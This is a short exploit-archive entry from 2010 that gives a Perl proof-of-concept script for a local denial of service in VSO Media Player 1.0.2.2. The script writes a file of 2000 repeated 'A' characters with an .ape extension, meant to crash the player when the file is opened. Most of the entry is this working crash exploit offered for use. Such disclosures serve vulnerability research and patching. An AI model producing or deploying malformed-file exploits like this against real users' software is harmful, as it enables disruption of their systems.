[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc
# Published : 2010-01-02
# Author : SarBoT511
# Previous Title : Google Chrome 4.0.249.30 DoS PoC
# Next Title : GOM player V 2.1.9 Local crash poc
#!usr/bin/perl
#Exploits title :[VSO Medoa Player Version 1.0.2.2 Local Denial Of Services poc]
#Date : [2010/01/02]
#Aouther : [SarBoT511]
#downloads :[www.vso-software.fr]
#tested on :[win xp sp2]
#VSO Medoa Player Version 1.0.2.2
$file="SarBoT511.ape";
$boom="A" x 2000;
open(myfile,">>$file");
print myfile $boom;
close(myfile);
print "Done ..! ~#";